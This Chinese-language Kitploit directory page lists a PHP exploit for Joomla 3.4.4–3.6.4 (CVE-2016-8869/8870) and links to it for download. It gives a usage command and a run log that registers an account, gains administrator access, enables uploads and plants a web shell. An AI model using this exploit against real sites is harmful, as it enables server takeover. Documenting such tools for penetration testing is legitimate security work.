Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
JoomlaCVE20168869 — 针对 Joomla 3.4.4 - 3.6.4 的漏洞利用程序(CVE-2016-8869 和 CVE-2016-8870) | Kitploit
工具/GitHubGitHub/rustyj4ck/joomlacve20168869
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubrustyj4ck/joomlacve20168869

JoomlaCVE20168869

针对 Joomla 3.4.4 - 3.6.4 的漏洞利用程序(CVE-2016-8869 和 CVE-2016-8870)

查看仓库
789年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

针对 Joomla 3.4.4 - 3.6.4 (CVE-2016-8869 和 CVE-2016-8870) 的利用程序,具有文件上传 Web Shell

这是 PHP 移植版本,原始 Python 源代码来自 @link https://github.com/XiphosResearch/exploits/tree/master/Joomraa

用法:php exploit.php --username hacker -p password -e [email protected] http://localhost:9994/

[0.000] 启动中... [0.000] 目标为 http://localhost:9994 [0.000] [-] 正在获取令牌 [0.464] ..fetch | GET | /index.php/component/users/?view=login | 200 [0.464] Token | 6cebed4c64eae7e8915b0bc7e0ca354e [0.464] [-] 正在创建用户账户 [0.760] ..fetch | POST | /index.php/component/users/?task=user.register | 303 [0.760] [!] 账户未创建或已存在 [0.760] [-] 正在获取管理员登录令牌 [1.113] ..fetch | GET | /administrator/index.php | 200 [1.113] Token | af3c362c9aa19347451656d2d24b79f2 [1.113] [-] 正在登录管理员后台 [2.368] ..fetch | POST | /administrator/index.php | 200 [2.368] [+] 管理员登录成功! [2.368] [+] 正在获取媒体选项 [3.221] ..fetch | GET | /administrator/index.php?option=com_config&view=component&component=com_media&path= | 200 [4.470] ..fetch | POST | /administrator/index.php?option=com_config | 200 [4.470] [] 上传 Shell [5.329] ..fetch | GET | /administrator/index.php?option=com_media&folder= | 200 [5.330] [-] 正在上传利用文件到 | /images/1k8iusc.pht [6.415] ..fetch | POST | http://localhost:9994/administrator/index.php?option=com_media&task=file.upload&tmpl=component&ed5766f9587758a07f90d6b1ba846723=r2pci9ua7bao40na38foiq7da7&b5dab50228f1e955bae66d8950cc29a7=1&format=html | 200 [6.415] [] 正在调用利用程序 [6.417] ..fetch | GET | /1.php | 200 [6.417] [$] 利用成功!

下载工具